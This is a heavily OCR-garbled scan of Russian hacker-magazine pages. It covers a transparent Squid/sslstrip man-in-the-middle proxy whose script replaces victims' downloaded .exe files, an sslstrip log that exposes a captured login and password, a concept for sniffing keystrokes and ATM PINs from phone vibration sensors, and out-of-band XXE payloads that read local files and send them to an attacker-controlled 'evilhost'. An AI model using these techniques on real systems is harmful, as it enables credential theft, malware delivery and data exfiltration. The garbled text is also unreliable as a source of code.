блиотека руІЕюп-ЕѵѵзЕесІ-ѵѵеЬ, инсталлим пакет: 



Чтобы пользователям не нужно было указывать НТТР-прокси 
вручную, сделаем его прозрачным, другими словами, перена- 
правим весь проходящий через нас НТТР-трафик на прослуши- 
ваемый сквидом порт 8888. Для этого будем пользоваться тем 
же самым правилом, которое применялось для ззізігір, не за- 
будь его (ззізігір) потушить: 

# ір-ЬаЫез -г па* -А РКЕКОІІТІІЧб -5 192,168.2.0/24 *- 
-р *ср -т т иІІіірог'Е -- фог~Е 80., 81 Л 8000., 8080 

-І КЕРІКЕСТ ---Ео-рог* 8 888 

Для достижения желаемого результата в закромах скви- 
да имеется замечательный инструмент — опция игІ_гешгі1е_ 
ргодгапл, позволяющая использовать внешнюю программу 
с целью анализа запросов и перенаправления на другой ис- 
точник. Нам остается только воспользоваться данной возмож- 
ностью, написав свой скрипт. Создадим минималистичный кон- 
фиг /еІс/зциісІЗ/здиісІ.соп-Г: 

# Включаем в список доступа кеш-гпапа^е г 

асі тапа^ег рго*о сасгіе_оЬ]'есЕ 

# Определяем список доступа с ІоорЬаск-адресами 

асі ІосаіЬоз* зге 127.0. Ѳ.1/32 ::1 



Схема преобразования # Определяем список доступа для НТТР-метода 
# арѣ-^е* іпэ'іаіі ру'Ыіоп-*мі5'1есІ-меЬ ір- адреса # соппес* и запрещаем его использование 



. Ч .*Ѵ* )Г [1Г | ■ -. , 
-г : — г 






192.168.2.5 



192.168.2.1/192.168.1.10 



192.168.1.1 



ІР сайта 
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Ананасовый рай 



7 * 



гіЬгегО~ 



сІЬ2егѲ@1оса1Ьо5*:~$ Таіі --Р 55І5Тгір.1о§ 

2013-04-12 19:24:56,546 5ЕСЦКЕ Р05Т РаТа (ра55рог! . уапсіех . ш) : 
■Ргот=ра55рогТ&геТраТЬ=М:Тр%ЗА%2Р%2Ртаі1.уапсІех.ги%2РІіТе%2РіпЬо 
х&і(1кеу=7АЫ36 57742 3ѲУк-РирСЦѴМс1І5р1ау=раее& 1оеіп=кігтеп5%40ѵап 
сіех . ги&ра55М(і=1^^И55 &Тіте5Татр=13657730944Ѳ9 

О 



Ззізігір показывает 
что-то полезное 



асі СОШЕСТ теНіосІ СОШЕСГ 
Иіі іір а ссезз сіепу СОШ ЕСТ 



# Добавляем обслуживаемую подсеть в список 

# контроля доступа ІосаІпе'Е 

ас і І осаіпеі: зге 192.168,2.0/24 



# Разрешаем доступ группе Іосаіпеі: 

Іт1;'1:р_ассе5з аііом _1оса1пе1: 

# Добавляем прозрачности нашему проксику 

И'Ь'Ь р рог*1і 8888 ’ігапзрагепі: 



#_ Г лавная часть, которая будет обрабатывать ІЖІ. 
игігемгіі е_р_ г о§ г ат / 1 т р / гр. ру 



# Стандартные разрешения и порт 

ІгЕ'Ь р асс езз аііом тапа^ег ІосаІЬозІ 

Іг Е'Ьраесезз сіепу тапа^ег 

ІгЕ ір ас с езз аііом ІоеаІИозІ : 

ІгІ:1:р_ассе55 сіепу аіі 

И'Ь'Ьр рогі: 312 8 

Время для захватывающего момента — пора написать 
скрипт, который мог бы определять, а главное — исправлять це- 
левые ссылки на свои изображения. Зциіб во время старта за- 
пускает несколько экземпляров программы игігеѵі/гііергодгат 
в фоне и отдает ей запрашиваемые пользователем 11Р!1_ через 
конвейер (ріре). Программа обрабатывает входящий поток 
ссылок и возвращает в зібоиі «измененныйигі + '\п'», если путь 
нужно изменить. В противном случае отдается просто '\п\ 

Код рерайтера Дтр/гр.ру, заменяющего все изображения 
на страницах, приведен ниже: 

# Заменяемое изображение 

ІМАСЕ= 1 ІтЕ1: р:/ /ехатр1е. сот/1і1е5/ЬооЬ5 . еіТ 1 

# Или заменяемый ехе 

ЕХЕ= ’ ІгЕѣр: // ехатріе . сот/біез/біе .ехе 1 



# Заменяем картинки на ітаяе 

фегР гер1асе_ітаёе5(диегу л _ігаа§е)^ 

# Получаем ЦКІ. 

ІТ диегу. бпсК 1 ' ) : игі = диегу. 5р 1 і±( 1 1 )[0] 
еізе: геіигп *\п* 



# Находим все ссылки с 


изображениями 




і-р ге.ЛпсІа11( ' . *(\ОРё 


ЛР е 8 


| Х.Ьтр 1 Х.рі-ГІ 


|\ — 



рпё)$‘ , игі) : 

# Возвращаем подмененную картинку 

геіигп '%з\п 1 % іта§е 
геіи гп ’ \п ' 



і-р пате 


і 


таіп 


1 . 
■ 


мМіІе 


1: 






# 


Чтение 


зѣсііп 






ШРО 



Мониторить в реальном 
времени список отдан- 
ных клиентам адресов 
можно, просматривая 
файл /ѵаг/ІіЬ/сІІіср/ 
сІРсрсІ.Іеазез. 



диегу - 5у 5 . з'ісііп . геасіііпе ( ) . 5І:гір ( ) 

# Функция, производящая замену 

# игі = геріасе ехе(диегѵ, ЕХЕ ) 

игі = геріасе ітаЕе5(диег у , ІМА6Е) 
зуз . зѣсіоиі: . мгііе (игф) 



# Исключение, срабатывающее при закрытии 

# ріре. которое означает, что Бдиісі 

# завершил работу 

Егу : 

зуб . зфсіоиф. Л и зЬ{ ) 

ехсерѣ ІОЕггог: 
зуз .е хі ѣ( Ѳ) 

Такой же трюк можно проделать с подменой всех ехе- 
файлов на свой, дописав функцию герІасе_ехе(): 



фе-р гер1асе_ехе (циегу, ехе)_і 

# Получаем ЦКІ. 

і-р диегу .фппсі ( 1 1 ) : игі = диегу . з р1 іѣ( 1 ‘ ) [ 0 ] 

еізе: ге іи гп 1 \ п ’ 

# Находим все ссылки, заканчивающиеся на *.ехе 

ІТ ге.ЛпсІа ІН 1 ,*\.ехе$ 1 . игі) : 

ге^игп ' %5\п 1 % ехе # Возвращаем наш ехе 

геі игп 1 \ п ' 



и раскомментировав строку в таіп : 



# Функция, производящая замену 

игі = геріасеехердие гу . Е ХЕ) 

# игі = геріасе ітааез (диегу , ІМАОЕ) 



Главный плюс такого подхода заключается в том, что ты ни- 
как не изменяешь содержание НТТР-страницы, которую видит 
жертва. По факту пользователю просто приходят иные файлы 
по тем же ЫРІІ_-адресам. 

Нам остается только перезапустить сервис, для того чтобы 
грозный кальмар взялся за свою мокрую работу: 

# зегѵісе бдиісІЗ .гезІагЬ 

ТОРЖЕСТВО НАХОДЧИВОСТИ 

Как видишь, порой не обязательно покупать готовое устройство. 
Можно попытаться самостоятельно его реализовать и, главное, 
расширить его функционал, используя, казалось бы, невинный 
опыт администрирования и традиционные инструменты. Все 
зависит от твоих целей и умения смотреть на вещи под другим 
углом, ведь даже ананас в твоих руках может стать грозным ору- 
жием! :) ИКИ 



Иллюстрация: Михаил Алексанов 
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У столов тоже бывают уши 




Универсальный мобильный шпион: 

подслушиваем вибрации 




0 П 56 С ІаЬ 








V Я 


1 С ОР* 


1 К 




1 ѵ и V 





Перехватывать пакеты неспортивно: сниффером сегодня умеет поль- 
зоваться каждый. А вот придумать новый концептуальный способ 
перехватывать данные, например набранные пароли, — вот задачка 
для настоящих джедаев. В наших головах появилась интересная идея, 
как по-новому можно шпионить за пользователем. Правда, воплотить ее 
в жизнь нам пока не удалось. Но ты нам можешь в этом помочь. 



ШВЕЙЦАРСКИЙ НОЖ 

Современный смартфон напичкан всевозможными датчиками 
и контроллерами. Все ради одной цели — стать более универ- 
сальным устройством и заменить собой как можно больше дру- 
гих девайсов. Зачем аудиоплеер, когда он есть в мобильном? 
Камера? Навигатор? Забудь: теперь все в одной коробке. И ка- 
чество каждой функции в таком комбайне растете каждым днем. 
Логично, что с повышением универсальности растет и количе- 
ство разнообразных неочевидных применений смартфонов. 
Сейчас, например, уже никого не удивишь Огоіб Збеер, который 
делает АВР зрообпд для ѴѴі-Рі-сетей. Не надо больших антенн — 
надо просто подойти максимально близко, и сделать это с теле- 
фоном в кармане проще простого. До неприличия просто! 

В этой статье мы поговорим об еще одном неочевидном при- 
менении современных мобильных — подслушивании вибраций. 

ИДЕЯ 

Эта идея пришла после участия в РІаісІСТР. Там было задание 
на распознавание кнопок клавиатуры по большому аудио- 
файлу, в котором были записаны звуки нажатий на разные 
клавиши. Идея такая: звук нажатия определяет кнопку, раз- 
ве не логично? Вполне! Это задание никто толком не сделал, 
но отважные ребята из іпіЗрісІз после конкурса выпустили 
прекрасный разбор этой задачки ( Ы1:.Іѵ/У002с ). Результаты 
ошеломляют: даже большие куски текста можно распознать 



по обычному частотнику. Причем без какого-либо обучения 
под конкретную клавиатуру. 

Вторым источником вдохновения стал ргооі'-оі'-сопсер* 
«Клавиатура из бумаги для іРІіопе 5» (ѵоиТи.Ье/бгІРЗЬТОиНЕ ). 
На основе показаний акселерометра и гироскопа Флориан 
Краутли (РІогіап Кгаиііі) из Лондонского университета смог ис- 
пользовать обычный стол как клавиатуру для своего іГаджета. 
Правда, для этого пришлось прибегнуть к машинному обуче- 
нию, но результата этот факт не умаляет. 

Соединяем А с Б и получаем, что можно пытаться отсниф- 
фать, какие именно кнопки нажал человек на ноутбуке или кла- 
виатуре, когда рядом с ними находился твой телефон. Микро- 
фон, гироскоп и акселерометр вместе будут независимыми 
источниками данных и уточнят показания друг друга. 

МЕРЯЕМ 

Недолго думая, мы собрали простой демонстрационный стенд 
из ІРІіопе 48, МасВоок Аіг и обычного деревянного стола родом 
из СССР (с полировкой, кстати). 

В качестве программы для сбора показаний датчиков ис- 
пользовался 5епзогІ_од — бесплатная программа в Арр $1оге, 
которая собирает показания практически всех устройств, 
встроенных в іРИопе, и записывает результаты в СЗѴ-файл. 
Затем лог можно отправить по электронной почте. Идеальная 
программа для наших целей, и главное — совершенно бес- 




\ѴАЯШЫС 



Вся информация предо- 
ставлена исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности за любой 
возможный вред, при- 
чиненный материалами 
данной статьи. 
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Взлом 
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платная. Аналогичные тулзы есть и для АпсІгоісІ, на случай, Пример логирования 

если ты захочешь измерить чувствительность девайсов под данных 

управлением этой ОС. 

Отодвигая телефон от ноута, мы пытались различить кнопки 
по вибрациям с одной целью: понять, улавливаются ли вообще 
нажатия в таком случае. Оказалось, что отлично улавливаются. 

Затем телефон постепенно отодвигали от ноутбука и измере- 
ния повторяли на каждые 5 см. Быстро выяснилось, что дальше 
10 см уже ничего отдатчиков не разобрать. Не такой уж хороший 
результат, но и не такой плохой. Учитывая, что у нас все равно 
остается микрофон. 

Пораскинув мозгами, мы поставили телефон на торец и по- 
вторили эксперимент. Как и ожидалось, чувствительность вы- 
росла. Теперь мы могли различить кнопки по датчикам уже 
с расстояния 15 и даже 20 см! Дело в том, что нижняя поверх- 
ность іРііопе 43 и пятого поколения сделаны из стекла. Стек- 
ло — материал аморфный и, следовательно, гасит вибрации. 

Боковины же, напротив, металлические, а металл, как известно, 
хорошо передает вибрации. 



но, предполагается, что контакты у них между собой установле- 
ны, — иначе откуда доступ к рабочему столу. Так вот, в качестве 
обучающего множества используется ответ испытуемого, полу- 
ченный весельчаком на его вопрос через службу мгновенных 
сообщений (другими словами, принятые с сенсоров данные со- 
поставляются с текстом ответа). Диалог продолжает до тех пор, 
пока сниффер не получит в свое распоряжение сигнатуры всех 
кнопок с ноутбука испытуемого. Весело? По нашему мнению, 
очень! 

Второй сценарий с обучением основывается на парал- 
лельном перехвате нешифрованного беспроводного трафи- 
ка, как классический ѴѴі-Рі-сниффер. Сопоставляя временные 
штампы пакетов с отсчетами вибрационного логгера, можно 
обучаться, скажем, путем поиска в трафике полей Іехіагеа, 
заполненных пользователем. Разумеется, нешифрованных, 
без 55І_. Зато, натренировавшись таким образом на контакти- 
ках/одноклассниках, вибросниффер будет вполне пригоден 
уже для перехвата настоящих логинов/паролей, недоступных 
для кл асси ческо го ѴѴі-Рі -сниффера ввиду 33 1_. 



ВОЗМОЖНЫЕ ПРИМЕНЕНИЯ 

Этот полушуточный концепт был изложен в докладе УпіѵегзаІ 
МоЬіІе ЗпіИег на очередном слете Беісоп Виззіа 27 марта в Пе- 
тербурге. Ознакомиться с презентацией можно по ссылке: 

сІе1 : соп-гУ88Іа.ги/15/0С07812-ипіѵаг5а1МоЫ1еЗпіТ1 : ег.рсИ : . Идея 
вызвала много интересных дискуссий, в ходе одной из которых 
новое применение предложил Алексей Тюрин из ЕРРЗсап. Такой 



СЦЕНАРИИ БЕЗ ОБУЧЕНИЯ 

Как бы мы хорошо ни считывали вибрации, нужно еще сопо- 
ставить им определенные клавиши — буквы и другие символы. 
Сделать это по частотному анализу можно, но ошибки очень 
велики, к тому же требуется большой объем текста. Если мы 
говорим про ноутбук, то набор текста будет актуален только 
для текущего его расположения: перемена места или поверхно- 
сти смажут все данные. Также надо знать язык ввода — короче 
говоря, проблем много. 

Без обучения легко распознать и когда именно при вводе 
пароля зажимался шифт (два коротких нажатия и два отщелки- 
вая клавиш, с учетом, что шифт — большая кнопка и нажима- 
ется, соответственно, с характерной звуковой и вибрационной 
сигнатурой). Это сокращает время, необходимое для полного 
перебора пароля (в идеале, когда мы знаем, на каких местах 
расположены символы какого регистра) по сравнению с обыч- 
ным перебором при известной длине пароля. Можно также 
комбинировать классический беспроводной сниффер с «на- 
новибрационным», сопоставляя временные штампы начала, 
скажем, ЗЗІ_-сессии по НТТРЗ и вводов двух последовательных 
слов {логин/пароль}. 

Все это хорошо, но не дает достаточной точности. В идеале 
ведь хочется получить полноценный кейлоггер с точностью хотя 
бы 85-90% (губа не дура, ага). А для этого нужно обучение. 

СЦЕНАРИЙ СОБУЧЕНИЕМ 

Один из возможных сценариев атаки был придуман и оказался 
незатейлив и очень эффективен. Испытуемому (жертвой на- 
зывать язык не поворачивается — мы ведь просто развлека- 
лись) на стол кладется телефон. Затем включается сниффер 
(это можно выполнить удаленно, например через ЗЗН-клиент). 
Весельчак (атакующий, ага) отправляет испытуемому в любом 
мессенджере сообщение с каким-нибудь вопросом. Естествен- 



Распределение белого девайс удобно использовать для считывания пин-кода на бан- 
шума и полезных дан- коматах: никакой л же -клавиатуры, камеры или как там оно еще 

ных в потоке делается. Обучение быстро и по месту, практически исключает 

ложные данные. Банкомат железный и отлично передает вибра- 
ции. Надеемся, что такой вариант мошенники никогда использо- 
вать не станут, так как воровать деньги — большое преступление! 

ЗАКЛЮЧЕНИЕ, ИЛ И «АЛЛО, МЫ ИЩЕМ ТАЛАНТЫ» 

Все это, конечно, хорошо, но далеко от самого главного — 
пт программного решения. Мы программировать под мо- 
бильные платформы не умеем совсем. Посему бросаем 
клич: программисты под андроид и яблоко, отзовитесь! Да- 
вайте вместе сделаем приложение, научим его распознавать 
нажатия кнопок, обучаться и много чему еще. Постановка 
задачи есть — требуются руки. Неужели не хочется сделать 
что-то по-настоящему хакерское ради развлечения? Ждем 
отзывов в формате «умею программировать под такую-то 
платформу, готов помочь» по адресу ІаЬ@опзес.ш. Не лени- 
тесь сделать что-то для Орел Зоигсе, сообщество будет вам 
всегда благодарно. ІЕ 
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параметров ХМЬ 



В последнее время код ХМЬ часто можно встретить 
в анализируемых веб-приложениях, и потому глубокие 
исследования алгоритмов работы этого языка становятся 
весьма популярными. Так, разработаны техники, позволяющие 
читать данные с файловой системы с помощью ошибок (еггог- 
Ьазесі аііаск), посимвольно перебирать содержимое ХМЬ 
с помощью схем Х80 (Ыіпб аЫаск)... Сегодня твоему вниманию 
предлагается новая ступень развития атак на ХМЬ. 



ч» ' 



Тимур Юнусов 

жѵга.рівесіігііу.ги 



Алексей Осипов 

жѵга.рівесигііу.ги 
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ВСЕ ДЕЛО В СУЩНОСТЯХ 

В спецификации языка ХМІ_ ( зіМѵ/сиѵС' 1 ) описано несколько 
типов так называемых сущностей, со многими из них мы зна- 
комы (именно сущности используются для проведения боль- 
шинства атак наХМЦ называемыхХМ1_еХ*егпаІ Епіііу — ХХЕ): 

• предопределенные сущности (ргесіеііпесі епііііез); 

• внутренние сущности (іпіегпаі епііііез); 

• внешние сущности (ехіегпаі епііііез); 

• внутренние сущности параметров (іпіегпаі рагатеіег 
епііііез); 

• внешние сущности параметров (ехіегпаі рагатеіег епііііез). 

До сих пор атаки на сущности в основном концентрирова- 
лись вокруг третьего типа (если не брать в расчет йоЗ) — ис- 
пользуя в качестве источника системной сущности различные 
файлы на файловой системе, можно было (не всегда) читать 
файлы с файловой системы через обратную подстановку дан- 
ных в ХМС или через вывод ошибок. Помимо этого, можно 
было проводить РоЗ, посимвольно перебирать содержимое 
подставленной сущности, читать файлы через РТР (РоситеЩ 
Туре Ресіагаііоп), что при включенном выводе ошибок позво- 
ляло частично отображать содержимое читаемого файла. 

СУЩНОСТИ ПАРАМЕТРОВ 

О таких конструкциях, как сущности параметров, большинство 
либо не слышало совсем, либо слышало когда-то краем уха, 
так что знакомы очень поверхностно. Для атак на ХМ 1_ он и были 
бесполезны (хватало и обычных сущностей) либо возвращали 
не все данные. 

Спецификация ХМ1_ говорит, что ссылки на сущности па- 
раметров могут располагаться только в РТР. Определение 
сущностей параметров задается путем размещения сим- 
вола % перед его именем. Знак процента используется так- 
же в ссылках на сущности параметров вместо амперсанда. 
Ссылки на сущности параметров сразу же разбираются в РТР, 
и подставляемое значение становится частью РТР, в то время 
как обычные сущности не разбираются. Сущности параметров 
не распознаются в теле документа. Иными словами, сущности 
параметров: 

1 . Разбираются на лету на этапе создания РТР. 

2. Позволяют создавать другие сущности и сущности пара- 
метров (что следует из первого). 

Примером документа, использующего сущности параме- 
тров, может быть такой: 

.< ?хт1 ѵ егзіоп ="1.0" епсос! іпр="ЦТ Р-8"?> 

<1 Р ОСТУ РЕ гоо! [ 

< ! ЕМТІТУ % рагаті ;Ч!ЕІ\ГГІТУ іпіегпаі 

' зоте^іехі ' >" > 

%рагат1; 

]> 

<гоо±>&іп1:егпа1;</гоо1:> 

Сущность параметра рагаті содержит определение вну- 
тренней сущности іпіегпаі, которая, в свою очередь, подстав- 
ляется в тег гооі и выводится пользователю. 

ВАЛИДНОСТЬ И ѴѴЕИ-РОПМЕОИЕ55 

Предположим, что у тебя есть проверяющий (ѵаіібаііпд) пар- 
сер и у него включена поддержка внешних сущностей (пока 
еще не столь редкое сочетание). Согласно спецификации язы- 
ка ХМІ_, при проверке документа должны соблюдаться опре- 



деленные ограничения (сопзігаіпіз). Подробнее об особенно- 
стях валидации и ограничениях в парсерах можно прочитать 
в статье Андрея Петухова (журнал «Хакер» за май 2012 года). 
Например, для атрибутов тегов они звучат так: 

• ѴѴеІІ-ІогтесІпезз сопзігаіпі: Упідие АН Зрес; 

• Ѵаіісіііу сопзігаіпі: АМгіЬиІе Ѵаіие Туре; 

■ ѴѴеІІ-ІогтесІпезз сопзігаіпі: N 0 Ехіегпаі Епіііу Пеіегепсез; 

• ѴѴеІІ-ІогтесІпезз сопзігаіпі: N 0 < іп АІІгіЪиІе Ѵаіиез. 

С первыми двумя все очевидно — определение атрибута 
должно быть уникальными и значение атрибута должно удов- 
летворять объявленному типу. Эти ошибки нам почти не ме- 
шают, а иногда даже помогают (те самые еггог-ЬазесІ ХХЕ 
іпіесііопз). 

Рассмотрим подробнее третье требование: атрибуты 
не должны прямо или косвенно содержать ссылки на внешние 
сущности. Действительно, следующие три документа не прой- 
дут проверку корректности: 

<?хго! ѵег5Іоп= ”1. Ѳ" епсосіі п^~ "ЦТ Р-8" ?> 

< ШОСТУ РЕ гооі: [ 

< ! ЕІМТІТУ ехіегпа]^ 5У5ТЕМ "йіе : ///с : /Ьооі . іпіГ> 

.]> 

<гооі аіѣгіЬ^'&ехіегпа І: 11 /> 



Еггор; Ехіегпаі епіііу 1 ехіегпаі' геіегепсе саппоі 
арреад іп ііге аТТгіЬиіе ѵаіие. ' 

И даже с помощью сущности параметра ничего не полу- 
чается: 

<?хт1 ѵегзіоп=‘^1. 0" епсосИпё="УТР-8" ?> 

< тоСТУ РЕ гооі: [ 

< ! ЕІМТІТУ % рагаті _1’<[ЕМТІТУ ехіегпаі 5У5ТЕМ ^ 

, 1і 1е:///с:/Ьооі . іпі , > ,, > 

%ра гаті; 

]> 

< гооі: аіі гі Ь= " &ехіегпа1; " /> 



Егго г: Т ііе ехіегпаХ. епіііу геіегепсе "&ехіегпа ! ; 11 
І5 поі регтіііесі ід ап аіігіЪиіе ѵаіие.. 



<?хт1_ ѵегзіоп=‘1і. 0" епсосИпё="ІЛ"Р-8" ?> 

<] РОСТУ РЕ гооі: [ 

<!ЕМІІТУ % рагаті 5У5ТЕМ "іііе : ///с : /Ьооі . іпі’ 1 > 
< ! ЕМТІТУ ехіегпаТ_"%рагат1і"> 

]> 

<гоо1: а1:1:гіЬ= ,, &ех1:егпа 1 ; 11 / > 



Еггог: А рагатеііег епІіГЬу ге-Регепсе І5 поі: аііоыесі 
іп іпіегпаі тагкир^/ 




ЕхіегпаІ епіііу 
в значении атрибута 

Чтение нескольких 
строк (ООВ) 

Чтение файлов большо- 
го размера (ООВ) 

Л истин г директорий 

Проверка схемы рас- 
положения 
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Последний пример особенно интересен. Он нарушает еще 
одно ограничение спецификации: ѴѴеІІ-ІогтесІпезз сопзігаіпі: 
РЕз іп Іпіегпаі ЗиЬзеІ. Мы не можем подставлять сущности па- 
раметров в определение внутренней ОТО. Но там же и написа- 
но про обход этого: Тбіз боев поі арріу Іо геіегепсез Шаі оссиг 
іп ехіегпаі рагатеіег епііііез ог Іо ііле ехіегпаі зиЬзеІ. Просто 
обратимся к внешнему документу, в котором и объявляются 
необходимые нам сущности параметров, далее их можно вы- 
звать в исходном документе. 

Так что произойдет, если часть ЭЮ будет определена во 
внешнем файле? По спецификации — поведение, связанное 
с ограничением подстановки внешних сущностей в атрибуты, 
не должно измениться, все данные будут проверены на дей- 
ствительность и корректность, подставлены и обработаны 
в дальнейшем. Но у некоторых парсеров, включая ІіЬхтІ (РНР/ 
РуІІюп/НиЬу}, Хегсез2 (Заѵа), 8узіет.ХМ1_ (.МЕТ), похоже, не- 
сколько иное мнение. 

Создадим на нашем сайте страницу следующего содержа- 
ния (заметь, никаких доктайпов): 

< ! ЕМТІТУ % рауіоасі 5Ѵ5ТЕМ " И 1е: ///с:/ЬооТ. іпі “> 

<_! ЕІМТІТѴ % ра дат1_ 'ЧІЕІЧТІТѴ іпіегпаі ^ 

1 %рау1оаб; ’ >"> 

Подставить сущность параметра во внутреннюю сущность 
нельзя. Во всяком случае, парсеры в баѵа и М3 очень недо- 
вольны такими попытками. 

А вот и исходный документ: 

<?хш1 ѵегзіоп="1.Ѳ" епсосІіп§="ІІТР-8^?> 

<_! РОСТУ РЕ горі [ 

< ! ЕІМТІТѴ % гетоіе 5У5ТЕМ 

"ІтЕ і р: //еѵі І Іі05 , Ь/еѵі1.хіп1 І, > 

%гетоіе.; 

%ра гатЗ^ 

]> 

кгооі: аТІгіЬ^'&іпіегпаІ : " /> 

Алгоритм разбора документа такой: 

1. Просматривается содержимое ОТВ. 

2. Обнаруживается определение и вызов системной сущно- 
сти параметра геплоіе. 

3. При вызове гетоіе происходит разбор И11р://еѵі}боз1/еѵіІ. 
хті. В этом файле определена системная сущность пара- 
метра рауіоаб, которую мы собираемся прочитать, и сущ- 
ность параметра рагаті, которая должна будет создать 
внутреннюю сущность іпіегпаі. 

4. Тут стоит заметить, что обращения к файлу ІіІе:///с:/ЬооІ. 
іпі еще нет и мы только сделали заготовку для нашей инъ- 
екции. 

5. Так как документ ІіПр://еѵіІІ'юзІ/еѵіІ.хтІ корректен, он под- 
ставляется в исходный документ на место вызова гетоіе. 

6. Вызываем сущность параметра рагаті и получаем в свое 
распоряжение сущность іпіегпаі, и неожиданно она не яв- 
ляется системной! 

Какой с этого профит? 

Если есть вывод атрибута — теперь он доступен. 

• Если есть доступ к ХЗО-схеме — возможен вывод 
в ошибке. 

ЕАЯОА-ВА8ЕО ВЫВОД 

Теперь немного подробнее про вывод через ошибку в ХЗО- 
схеме. Принцип в целом похож на тот, который используется 
при валидации РТР-схем. Если вкратце — у нас есть исход- 



ный ХМІ_-документ и есть описание всех его полей. Если до- 
кумент не соответствует своему описанию, парсер выведет 
ошибку. 

<хзіге5ігіс1:іоп Ьазе="х5^_5і:гіпё"> 
схзіраііегп ѵа1и е= "&іп1:ег , па1: " /> 

</х5 : гезігісііоп^ 

УЬхтІ также отображает до 1300 байт содержимого файла 
в тексте ошибок, вызываемых следующими конструкциями: 

<?хт1 ѵ егзіоп="1. 0 " епсос!іпё="уТР-8" ?> 

< ! РОСТУР Е г о оі: [ 

< ! ЕІМТІТѴ % гетоіе 5Ѵ5ТЕМ 
" біір : //еѵі 1 І іозі / еѵіі . хті!' > 

%гетоіе; 

]> 

<гооі /> 

Содержимое ЕѵіІ.хтІ: 

<_! ЕМТІТУ % Т4. 5Ѵ5ТЕМ "йіе: ///с : /Ь ооі. і пі"> 

Здесь необходимо подставить один из пяти предложенных 
ниже векторов: 

1. %14; 

2. ОІЧОТАТЮІЧ а%14; 6ѴЗТЕМ ’1а1а > 

3. СІЕІЧТІТУ %14; С О АТА > 

4. <!ЕІ\ІТІТѴ % 16 "СІЕІЧТІТѴ :%14;>”> %16; 

5. <! ЕМТІТУ % 16 "<!МОТАТІОМ :%14;>”> %16; 

Скажем, РНР выводит их в рамках предупреждений 
(ѴѴагпіпд), то есть при еггог_герог!іпд>=Е_ѴѴАПМІМО мы полу- 
чим профит! 

ХХЕ ОАТА ВЕТВІЕѴМ 

Теперь подходим к самому сладкому. Зачем нам вообще ХМ1_- 
инъекция? Чтобы получить некие данные. С помощью сущно- 
стей параметров мы можем обращаться к внешним ресурсам, 
передавая в них «полезную нагрузку» — содержимое файлов 
с сервера, на котором находится парсер, через системные 
сущности с помощью методики, описанной в предыдущем 
пункте (это позволяет атаковать парсеры, на которых отключен 
любой вывод данных!): 

1. Подаем на вход парсеру ХМІ_ следующий документ: 




де (ХМІ_) 1.0 



МоѵетЬег 2008 



НТТР /1,0 




<'Е [IV ѴЁІПѴ? вШ ЗУ5ТЕН 

1 Иыр : / /еѵі ІИозс ! ІСЗ Ч/гезиІі: ?\ рауіоай; 



РОЗТ / 1ШТ 
Ноде; 
Сопсепг- 




КУ 



СІ 



<?хія1 ѵегэіоп="і .0” епсосІіпд^'ШТ-8'* дцапсіа1опе="по , '?> 

< 1 ООСТТРЦЩаі 

<!ЕМТЖ^ше ѴеѵШюзі/еѵіІ . хтГ*> 

3> 







5ТАНР! 



( > ,г > 



Читаем локальные 
файлы 



Что произойдет, если часть БИ) будет 
определена во внешнем файле? По специфи- 
кации — поведение не изменится. Но у не- 
которых парсеров на это счет свое мнение 



< ?хт1 ѵе гзіоп= "1.0 " епс обі п р="ЦТР-8 " ?> 
<]00СТѴРЕ гооі [ 

<! ЕІМТІТѴ % гетоіе 5Ѵ5ТЕМ ^ 

" Иіір: //еѵі ІЬозі/еѵіІ. хті" > 

%гето1:е^ 

%рагат1^ 

]> 

< гоо1:>&ех1:егпаІ4</гоо1:> 
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В обход ограничений 



79 



2. При обработке данного ОТО парсер при вызове сущности 
параметра гетоіе обратится к нашему ресурсу и, если 
он будет доступен (что, конечно, не всегда так), подгрузит 
из него следующее содержимое: 

<] ЕМТІІѴ % рауіоаб 5У5ТЕМ "б1е:///с:/ЬооФ.іпі"> 

<]ЕМТ1ТУ % рага ті "< ! ЕЖШ ехФегпаІ БѴБТЕМ^ 

' ІтЫір: //еѵі1Ііо5І:/1ой. рМр?1од=%рау1оасІ ; ' >"> 

Далее парсер определит сущность параметра рагаті, вы- 
зовет ее в основном документе сразу после вызова геплоіе. 
В рагаті находится определение ехіегпаі, к которой мы и об- 
ращаемся в теле ХМ І_- документа. Данная конструкция позво- 
ляет прочитать содержимое файла Ьоофіпі, подставить его 
значение в системную сущность, обойти ограничения на опре- 
деление сущностей параметров в других сущностях и при вы- 
зове ехіегпаі передать на контролируемый нами сервер со- 
держимое файла. 

Иногда бывает, что простые сущности не работают в пар- 
сере, тогда на помощь приходит такая конструкция (в которой 
используются только сущности параметров): 

1 . Подаем на вход парсеру ХМІ_ следующий документ: 

<?хт1 ѵ егзіоп="1.Ѳ" епсос!іпд ="ІЛТ-8 "?> 

< і РОСТУ РЕ гроф [ 

< ! ЕІШТѴ % гетоФе 5Ѵ5ТЕМ 
’’ ЬФФр: //еѵі 1 Ьр 5ф / е ѵі 1_2 . хті" > 

%гетоФе; 

]> 

< гооф / > 



Если у нас есть возможность влиять 
на весь документ в целом, то мы можем 
реализовать не только обращение на сто- 
ронний сервер, но и некоторую логику пре- 
образования 



<абб кеу="Ра55М)ГсГ ѵа1ие="по_ра55иогсГ /> 
сасісі кеу="Рот аіп" ѵа1ие="" /> 

</5_АМРЦЕ> 



<5у5І;егТІ.МеЬ> 

ксизФотЕггогБ тобе="0Ф : -р"/> 
ксотріІаФіоп беФаи1ФІ_апеиайе="С#" 
сіеЬиа~"ФаІ5е"/> 

кібепФіФу ігпрег50паФе="Фгие‘'/> 

кра^ез ЬиФФег="Фгие" 

епаЬІеБеББІопБФаФе^'ФаІБе" 

епаЬ1еѴіем5ФаФе^Чгие , '/> 

</5у5Фет.иеЬ> 



</сопДйига Ф іоп> 

И если мы контролируем ХРаІб, то можем запросить сле- 
дующее; 



2. Содержимое ех1_2.хтІ: 

<] ЕІМПТУ % рауіоасі 5Ѵ5ТЕМ "біе^/с і/ЬооФ . іпі"> 
< ! ЕМТІТУ % рагаті ЧІЕМТІТ У &#37: ехФегпа І 
5ѴБТЕМ "ИФ Фр: //еѵіНіоз Ф /Іок . рбр?^ 

1ой=%рау1оаб: " > ' > 

%рагат1 ; 

%ехФегпа1; 



Отличие данной методики от предыдущей заключается 
в том, что атака происходит только на этапе объявления РЮ. 

Х8Н + ХРАТН ОІІТ-ОР-ВАЫО ТЕХНИКА 

Сущности-параметры не единственный способ создания 
сущностей параметров с помощью ХМІ_. Х81.Т и главным 
образом ХРаІб имеют свой набор функций для обращения 
к сторонним ресурсам. И что особенно важно — имеют воз- 
можность изменять эти данные. Предположим, у нас есть 
возможность влиять только на ХРаІб, тогда мы можем про- 
